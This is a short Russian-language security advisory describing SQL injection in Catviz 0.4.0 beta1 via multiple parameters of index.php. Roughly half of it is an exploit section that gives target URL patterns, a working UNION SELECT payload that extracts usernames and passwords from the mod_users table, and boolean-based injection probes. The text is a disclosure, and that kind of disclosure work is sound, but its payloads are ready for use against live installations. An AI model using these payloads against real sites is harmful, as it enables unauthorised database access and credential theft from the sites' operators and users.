Программа: Catviz 0.4.0 beta1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных во множественных параметрах сценарием index.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://[target]/[path]/index.php?module=news&news_op=form& form_name=article&form_action=show&foreign_key_value=[SQL]
http://[target]/[path]/index.php?webpages_form=webpage_multi_edit&webpage=[SQL]
index.php?module=news&news_op=form&form_name=article &form_action=show&foreign_key_value=10
union select 1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32 from
mod_users/*
index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1
index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0
